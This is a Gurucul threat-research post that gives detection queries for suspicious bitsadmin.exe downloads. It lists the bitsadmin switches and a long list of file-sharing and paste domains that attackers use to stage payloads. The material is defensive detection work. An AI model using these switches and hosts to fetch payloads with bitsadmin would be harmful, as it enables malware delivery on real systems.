Suspicious Download From File-Sharing Website via Bitsadmin

    Monday, June 29, 2026 In: Threat Research Print

    Date: 06/29/2026

    Severity: High

    Summary

    Suspicious Bitsadmin File Download via Untrusted Domain 

    Indicators of Compromise (IOC) List

    Image :

    - '\bitsadmin.exe'

    OriginalFileName : 

    - 'bitsadmin.exe'

    CommandLine : 

    - ' /transfer '

    - ' /create '

    - ' /addfile '

    - '.githubusercontent.com'    

    - '0x0.st'

    - 'anonfiles.com'

    - 'bashupload.com'

    - 'cdn.discordapp.com'

    - 'chunk.io'

    - 'ddns.net'

    - 'dl.dropboxusercontent.com'

    - 'ghostbin.co'

    - 'github.com' 

    - 'glitch.me'

    - 'gofile.io'

    - 'hastebin.com'

    - 'mediafire.com'

    - 'mega.nz'

    - 'onrender.com'

    - 'pages.dev'

    - 'paste.ee'

    - 'pastebin.com'

    - 'pastebin.pl'

    - 'pastetext.net'

    - 'privatlab.com'

    - 'privatlab.net'

    - 'send.exploit.in'

    - 'sendspace.com'

    - 'storage.googleapis.com'

    - 'storjshare.io'

    - 'supabase.co'

    - 'temp.sh'

    - 'transfer.sh'

    - 'trycloudflare.com'

    - 'ufile.io'

    - 'w3spaces.com'

    - 'workers.dev'

    - 'x0.at'

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    resourcename = "Windows Security" and eventtype = "4688" and processname like "\bitsadmin.exe" and originalfilename like "bitsadmin.exe" and commandline IN ("/transfer","/create","/addfile") and commandline In (".githubusercontent.com","0x0.st","anonfiles.com","bashupload.com","cdn.discordapp.com","chunk.io","ddns.net","dl.dropboxusercontent.com","ghostbin.co","github.com","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","x0.at")

    Detection Query 2 :

    technologygroup = "EDR" and processname like "\bitsadmin.exe" and originalfilename like "bitsadmin.exe" and commandline IN ("/transfer","/create","/addfile") and commandline In (".githubusercontent.com","0x0.st","anonfiles.com","bashupload.com","cdn.discordapp.com","chunk.io","ddns.net","dl.dropboxusercontent.com","ghostbin.co","github.com","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","x0.at")

    Reference:     

     https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml                         


    Tags

    Sigma

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2026 by Gurucul - All rights reserved.